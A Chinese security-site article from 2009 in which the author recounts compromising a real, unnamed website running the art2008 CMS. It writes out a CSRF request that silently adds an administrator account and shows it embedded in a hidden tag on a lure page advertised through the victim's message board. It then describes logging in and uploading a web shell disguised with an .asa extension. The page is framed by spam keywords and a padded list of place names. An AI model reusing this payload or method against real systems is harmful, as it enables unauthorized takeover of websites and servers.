国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

一次基于CSRF下的攻擊實例
2009-05-26   安全中國

最近想測試一下用CSRF來搞一個站有多快?  于是乎就測試了一下,結果還是挺讓人滿意的。廢話不多說了, 切入正題。 文章沒技術含量,望高手別捧腹大笑 - -||

我從源碼站里下了一套源碼,名曰:art2008  我是從增加管理員這里進行CSRF的, 同過抓包 我發現,構造一個鏈接如:


http://www.xxx.com/admin/admin_admin.asp?
action=savenew&username=11111&PrUserName=11111&
passwd=123456&passwd2=123456&sex=%CF%C8%C9%FA
&
fullname=%B9%FE%B9%FE&email=xss@qq.com&
depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+[code]

就能夠自動增加一個管理員,  于是乎測試了一下,發現可以增加。然后便開始找對象進行試驗..

google了一下 , 找了個管理員經常上的網站進行了測試, 然后我先是在自己空間上建立了以個test.htm 代碼如下:


[code]你喜歡包拯嗎? 
http://www.xxx(名字略).com/admin/admin_admin.asp?
action=savenew&username=111111&
PrUserName=111111&passwd=123456&
passwd2=123456&sex=%CF%C8%C9%FA&
fullname=%B9%FE%B9%FE&email=xss@qq.com&
depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+" width="0" height="100">


然后找到那個網站的留言板,開始留言,如圖: 




當管理員訪問我的網站時候,他便被CSRF了。。 就在此后, 我便去玩CS了,戰績還不錯- - 殺16死5.

當我回來時候,管理員已經回復了(- - ||真快阿)如圖:


 



 


管理員應該訪問了我的網站,于是我迅雷不及掩耳之勢的跑去后臺看看有沒有成功增加,用戶名:111111 密碼:123456  結果成功登陸了!! 如圖:


 



 


后臺后個上傳,改了一下擴展名asa  ,馬兒便飛到了服務器上,  如圖:


 




大概計算了一下,一共花費了約30分鐘左右的時間。

熱詞搜索:

上一篇:端午節要來臨 黑客盯民俗網站
下一篇:落實等級保護 構建安全“城堡”—啟明星辰等級保護在行業中的應

分享到: 收藏
主站蜘蛛池模板: 山西省| 朝阳市| 阳曲县| 蒲城县| 大兴区| 汉中市| 白银市| 安龙县| 信阳市| 阳高县| 定兴县| 巴东县| 澄城县| 惠来县| 同德县| 沁水县| 高淳县| 茌平县| 岳普湖县| 北宁市| 通榆县| 遂昌县| 新泰市| 晋江市| 密云县| 嘉祥县| 虞城县| 永善县| 六安市| 故城县| 丰城市| 游戏| 南宁市| 中西区| 多伦县| 大竹县| 怀柔区| 陕西省| 和平区| 潞西市| 轮台县|